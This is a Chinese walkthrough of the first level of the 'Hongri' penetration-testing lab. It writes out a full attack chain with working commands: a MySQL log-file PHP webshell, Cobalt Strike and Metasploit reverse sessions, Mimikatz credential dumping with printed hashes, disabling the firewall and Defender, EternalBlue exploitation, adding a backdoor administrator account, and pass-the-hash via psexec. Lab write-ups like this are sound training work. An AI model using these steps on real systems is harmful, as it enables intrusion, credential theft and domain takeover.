红日靶场第一关
一、环境配置
NET网卡(kali、windows)
kali:172.16.12.187
windows:172.16.12.1
靶机win7:172.16.12.127
VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2)
内网靶机Win2K3:192.168.52.141
内网靶机Win2008 R2:192.168.52.138
内网靶机win7:192.168.52.163
二、目标
一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜集与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集
三、内网收集
7.内网——继续信息收集
8.内网攻击姿势——信息泄露
9.内网攻击姿势——MS08-067
10.内网攻击姿势——SMB远程桌面口令猜测
11.内网攻击姿势——Oracle数据库TNS服务漏洞
12.内网攻击姿势——RPC DCOM服务漏洞
四、横向移动
13.内网其他主机端口——文件读取
14.内网其他主机端口——redis
15.内网其他主机端口——redis Getshell
16.内网其他主机端口——MySQL数据库
17.内网其他主机端口——MySQL提权
五、构建通道
18.内网其他主机端口——代理转发
六、持久控制
19.域渗透——域成员信息收集
20.域渗透——基础服务弱口令探测及深度利用之powershell
21.域渗透——横向移动[wmi利用]
22.域渗透——C2命令执行
23.域渗透——利用DomainFronting实现对beacon的深度隐藏
24.域渗透——域控实现与利用
七、痕迹清理
25、日志清理
三、WEB外网打点
3.1 日志文件Getshell
访问网站:
猜解MySQL数据库连接检测:(root/root)
目录扫描dirsearch(phpmyadmin):
直接写入木马到网站的根目录,写入失败(需要修改 MySQL 配置才行)。所以可以采用MySQL日志导入木马。
查看日志状态:
show variables like '%general%';
开启general_log为True:
SET GLOBAL general_log='on';
执行命令指定日志写马:
SET GLOBAL general_log_file='C:/phpStudy/www/1.php';
写入一句话到马中:
SELECT '<?php eval($_POST["cmd"]);?>';
访问日志文件:
冰蝎/蚁剑/菜刀连接:
3.2 后台文件上传getshell
yxcms模板:
登录后台后——前台模板——新建:(写入木马)连接即可。
通过代码审计或目录遍历漏洞,寻找到上传路径:
连马即可getshell。
四、内网信息收集
4.1 上线CS
管理员启动命令行:teamserver 172.16.12.1 123456
攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行
上线CS成功:
4.2 基本内网信息收集
4.2.1 Mimikatz工具抓取本机用户名密码:
4.2.2 提权SYSTEM用户
4.2.3 内网收集命令
net view #查看局域网内其他主机名
net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user #查看本机用户列表
net user /domain #查看域用户
net localgroup administrators #查看本地管理员组(通常会有域用户)
net view /domain #查看有几个域
net user 用户名 /domain #获取指定域用户的信息
net group /domain#查看域里面的工作组,查看把用户分了多少组(域控上操作)
net group 组名 /domain #查看域中某工作组
net group "domain admins" /domain #查看域管理员的名字
net group "domain computers" /domain #查看域中的其他主机名
net group "doamin controllers" /domain #查看域控制器主机名
1.判断是否存在域
shell ipconfig /all(SYSTEM)
shell net config Workstation(Administrator)
2.判断是否存在多个域
shell net view /domain
3.确认域控主机名称
shell net group “domain controllers” /domain
4.查看域内其他主机信息
shell net view
5.判断其余主机是否存在域内
shell net group “domain computers” /domain
五、横向渗透
(永恒之蓝)
5.1 联动MSF监听
MSF开启监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost MSFIP地址(172.16.12.187)
set lport 6666
exploit
CS开启监听:
增加会话,选择MSF:
5.2 判断陷阱
查看监听当前目录: ls
判断靶机是否进入蜜罐:run post/windows/gather/checkvm
列举安装程序:run post/windows/gather/enum_applications
5.3 静态路由配置
MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由,直接使用 MSF 去访问原本不能直接访问的内网资源,只要路由可达我们既可使用 MSF 来进行探测了。
#加载MSFautoroute模块,探测当前机器所有网段信息
meterpreter > run post/multi/manage/autoroute
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD
5.4 内网继续信息收集
5.4.1 扫描域内其他主机开放的端口
(扫描靶机2008R2)
msf6>use auxiliary/scanner/portscan/tcp
msf6>set rhost 192.158.52.141
msf6>set ports 80,135-139,445,3306,3389
msf6>run
5.4.2 扫描漏洞
msf6>search ms17_010msf6>use auxiliary/scanner/smb/smb_ms17-010msf6>set rhosts 192.168.52.141msf6>run
5.4.3 关闭跳板机win7防火墙
msf6>sessions -l #查看所有绘画msf6>sessions 4 #进入会话4中netsh advfirewall set allprofiles state off #关闭防火墙net stop windefend #关闭windows defender
5.4.4 永恒之蓝
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.52.138run
(3389远程)
开启靶机win7远程桌面MSF:run post/windows/manage/enable_rdpwindows:# win7开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# 添加账户密码net user Tr0e Pass!@123 /add# 给Tr0e账户添加为管理员权限net localgroup administrators Tr0e /add# 查询是否成功添加 Tr0e 用户net user Tr0e# 添加防火墙规则netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
连接用户名 GOD\Administrator 密码cllmsyK123
(MSF哈希传递攻击PTH)
5.5 Hash传递攻击
【哈希传递攻击】在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机,操作简单、威力无穷。在域环境中,利用哈希传递攻击的渗透方式往往是这样的: 1.获得一台域主机的权限,Dump 内存获得该主机的用户密码 Hash 值; 2.通过哈希传递攻击尝试登录其他主机; 3.继续搜集 Hash 并尝试远程登录,直到获得域管理员账户 Hash,登录域控,最终成功控制整个域。
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : 63b1e629a4f9202f82fbc0049075c50d
* NTLM : 9d0ba28e4fcf08d74bf61b4d50c46474
* SHA1 : e2b817228b94e9bec7e979516b98b604880ad5a8
tspkg :
* Username : Administrator
* Domain : GOD
* Password : cllmsyK
5.6 MSF
use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser Administrator
set smbdomain GOD
set smbpass 00000000000000000000000000000000:9d0ba28e4fcf08d74bf61b4d50c46474
run
3042
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
